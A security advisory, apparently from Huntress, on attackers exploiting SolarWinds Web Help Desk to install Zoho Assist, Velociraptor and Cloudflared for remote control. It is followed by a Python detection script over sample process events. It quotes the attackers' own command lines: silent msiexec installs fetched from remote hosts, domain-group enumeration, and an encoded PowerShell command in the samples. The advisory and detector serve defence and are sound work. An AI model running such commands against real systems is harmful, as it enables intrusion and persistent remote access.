SolarWinds Web Help Desk (WHD) has a remote code execution (RCE) vulnerability that is being actively exploited, and attackers are quickly using compromised instances to deploy legitimate but widely abused administrative tools. Huntress has observed SolarWinds Web Help Desk running on 84 endpoints across 78 organizations within its partner base, highlighting the breadth of the exposure.

Huntress observed post-exploitation activity originating from a compromised WHD service. The attack chain began with the WHD service wrapper spawning java.exe, the underlying Tomcat-based application. The Java process then used cmd.exe to install a remote MSI payload silently:

msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi

This payload delivered a Zoho ManageEngine RMM (Zoho Assist) agent staged through the Catbox file-hosting service.

Although Zoho Assist is a legitimate remote management tool, its ability to provide persistent, unattended access has made it a popular post-exploitation choice. In this instance, the agent was registered to an attacker-controlled Zoho account tied to a Proton Mail address, giving the attacker immediate interactive control. This activity is closely related to Microsoft's February 6 advisory, which confirmed in-the-wild exploitation of SolarWinds WHD vulnerabilities for RCE and the deployment of follow-on tooling.

Help Desk Attack Timeline: Reconnaissance and Lateral Movement

After the RMM agent became active, the threat actor switched to hands-on-keyboard activity.

Using the Zoho RMM process (TOOLSIQ.EXE) as their execution context, they began Active Directory reconnaissance:

net group "domain computers" /do

This enumeration step lets an attacker map domain-joined systems and rank targets, a classic prelude to lateral movement. Shortly after reconnaissance, the attacker used another silent MSI installer, hosted in an attacker-controlled Supabase bucket, to deploy Velociraptor, an open-source DFIR platform:

msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi

Although Velociraptor is built for defenders, its ability to execute commands, collect artifacts, and remotely control endpoints makes it a capable command-and-control (C2) framework when misused.

The observed deployment used Velociraptor version 0.73.4, an out-of-date release with a known privilege escalation vulnerability that has surfaced in previous campaigns.

In a pattern previously linked to ToolShell exploitation and Warlock ransomware activity, the Velociraptor client communicated with attacker infrastructure hosted behind a Cloudflare Worker (auth.qgtxtebl.workers[.]dev). With Velociraptor running as a Windows service, the attacker quickly executed a series of base64-encoded PowerShell commands. These disabled Windows Defender and the Windows Firewall through registry changes and then immediately installed Cloudflared from GitHub's official release channel.

This established a backup, tunnel-based access route, providing redundancy in case one C2 channel was disrupted. One of the more notable tradecraft choices was the use of Get-ComputerInfo to collect comprehensive system information and push it directly, via the Bulk API, into an Elastic Cloud deployment under the attacker's control.

Ironically, the attacker used Elastic's own SIEM tooling to build a centralized platform for victim management and triage. This campaign shows how easily attackers can move from a single internet-exposed management interface to full interactive control, persistence, and enterprise-wide visibility, using trusted tools that blend in with everyday administrative noise. Organizations running SolarWinds Web Help Desk should urgently update to version 2026.1 or later, which fixes CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551.

Beyond rotating credentials and removing administrative interfaces from direct internet exposure, hosts should be examined for silent MSI installs, encoded PowerShell execution tied to WHD processes, and unauthorized remote access tools. Defenders should expect active scanning and rapid weaponization as exploitation spreads, and respond accordingly.
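As an added example (not code from Huntress or this article), the following Python applies those three host checks to constructed process-creation events modelled on the chain described above: a quiet msiexec install from a URL under a WHD java.exe parent, net group enumeration from an RMM parent, and an encoded PowerShell command, which it decodes. The file paths and URL are placeholders, not indicators from the campaign.

```python
import base64
import re
import shlex
from pathlib import PureWindowsPath

# Constructed Sysmon/4688-style process-creation events modelled on the chain above
# (WHD java.exe -> cmd.exe -> remote quiet MSI; RMM -> net group; service -> encoded PS).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\WebHelpDesk\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c msiexec /q /i https://files.example.invalid/tmp9fc.msi"},
    {"parent": r"C:\Program Files\ZohoAssist\TOOLSIQ.EXE",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net group "domain computers" /do'},
    {"parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + base64.b64encode("Get-ComputerInfo".encode("utf-16-le")).decode()},
]
WHD_PARENTS = {"java.exe"}  # WHD's Tomcat runs as java.exe, as described in the text

def _base(path):
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return a list of (tag, detail) findings for one process-creation event."""
    findings = []
    toks = shlex.split(event["cmdline"], posix=False)  # keep Windows-style quoting intact
    low = [t.lower() for t in toks]
    # 1. msiexec installing straight from a URL with a quiet switch (/q, /qn, /quiet)
    if any("msiexec" in t for t in low) and any(t.startswith("/q") for t in low):
        urls = [t for t in toks if re.match(r"^https?://", t, re.I)]
        if urls:
            tag = "remote_silent_msi_from_whd" if _base(event["parent"]) in WHD_PARENTS \
                else "remote_silent_msi"
            findings.append((tag, urls[0]))
    # 2. encoded PowerShell: -e, -ec, -enc ... any unique prefix of -EncodedCommand
    if _base(event["image"]) in {"powershell.exe", "pwsh.exe"}:
        for i, t in enumerate(low[:-1]):
            if len(t) >= 2 and (t == "-ec" or "-encodedcommand".startswith(t)):
                try:
                    decoded = base64.b64decode(toks[i + 1]).decode("utf-16-le")
                except (ValueError, UnicodeDecodeError):
                    decoded = "<undecodable>"
                findings.append(("encoded_powershell", decoded))
    # 3. domain group enumeration via net.exe (/do is a valid prefix of /domain)
    if _base(event["image"]) in {"net.exe", "net1.exe"} and "group" in low \
            and any(len(t) >= 3 and "/domain".startswith(t) for t in low):
        findings.append(("ad_recon", _base(event["parent"])))
    return findings
```

Run over real telemetry, the parent-process context is what separates the WHD exploitation chain from routine software deployment that also uses quiet MSI installs.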
